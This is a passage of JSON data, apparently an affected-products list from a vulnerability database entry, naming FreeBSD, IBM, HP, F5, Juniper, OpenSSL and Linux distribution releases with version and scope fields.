"freebsd", "version": "5.0" }, { "model": "-stablepre2001-07-20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.10" }, { "model": "6.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "7.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.2" }, { "model": "7.0-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "junos os 13.3r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "7.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.4" }, { "model": "7.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2x" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "7.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.0-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "8.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "servicecenter", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0.x" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.31" }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7" }, { "model": "-pre-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "8.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "7.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.5" }, { "model": "7.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3x" }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.3-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stablepre2002-03-07", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.11" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.2" }, { "model": "8.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6.1" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.3" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "7.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "8.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.3-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "6.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "7.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "8.3-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "10.0-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "9.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "-release-p1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "8-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.4" }, { "model": "-release-p6", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "8.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "7.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2-" }, { "model": "9.1-release-p18", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "junos os 14.1r2-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "7.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4x" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0.x" }, { "model": "junos os 13.3r3-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.33" }, { "model": "7.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0" }, { "model": "10.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3" }, { "model": "6.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.1-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "7.0-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "8.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "8.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "6.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5x" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "-release-p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p32", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "7.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "storage provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.3.2" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "10.0-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "8.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1x" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "7.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0.x" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.21" }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "release -p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2-" }, { "model": "8.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2x" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", 